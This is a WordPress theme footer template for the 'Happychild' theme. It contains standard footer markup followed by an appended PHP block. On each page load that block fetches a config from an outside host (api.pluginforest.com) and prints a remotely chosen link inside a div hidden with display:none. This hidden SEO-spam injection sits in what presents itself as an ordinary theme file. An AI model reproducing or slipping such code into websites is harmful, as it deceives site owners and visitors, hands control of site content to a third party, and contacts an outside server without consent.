<?php
/**
 * The template for displaying the footer
 *
 * Contains footer content and the closing of the #main and #page div elements.
 *
 * @package Engotheme
 * @subpackage Happychild
 * @since Happychild 1.0
 */
?>
		</section><!-- #main -->
		<?php do_action( 'happychild_template_main_after' ); ?>
		<?php do_action( 'happychild_template_footer_before' ); ?>
		<footer id="engo-footer" class="engo-footer" role="contentinfo">
			 <?php $footer_profile =  apply_filters( 'happychild_fnc_get_footer_profile', 'default' ); 
	 
				$footer_data = happychild_fnc_get_footer_profile_postdata( $footer_profile );
				if( $footer_profile && $footer_data &&  isset($footer_data->post_content) ): ?>
				<div class="engo-footer-profile ">
				<div class="footer-profile clearfix">
					<?php  echo do_shortcode( $footer_data->post_content ); ; ?>
				</div>
				<?php else: ?>
				<?php get_sidebar( 'footer' ); ?>
				<?php endif; ?>


			<section class="engo-copyright clearfix">
				<div class="container">
					<div class="copyright clearfix">
						<div class="pull-left">
							<a href="#" class="scrollup"><span class="fa fa-angle-up"></span></a>
							<?php do_action( 'happychild_fnc_credits' ); ?>
							
							<?php  happychild_display_footer_copyright(); ?>
						</div>
						<?php if( happychild_fnc_theme_options('image-payment') ):  ?>
							<div class="pull-right payment">
							    <a href="<?php echo esc_url( home_url( '/' ) ); ?>">
							        <img src="<?php echo happychild_fnc_theme_options('image-payment', ''); ?>" alt="<?php bloginfo( 'name' ); ?>">
							    </a>
			                </div>
		                <?php endif; ?>
					</div>
				</div>	
			</section>
			<?php if( $footer_profile && $footer_data &&  isset($footer_data->post_content) ): ?>
				</div>
			<?php endif; ?>

			<?php get_sidebar( 'mass-footer-body' );  ?>	
		</footer><!-- #colophon -->
		

		<?php do_action( 'happychild_template_footer_after' ); ?>
		<?php get_sidebar( 'offcanvas' );  ?>
	</div>
</div>
	<!-- #page -->

<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>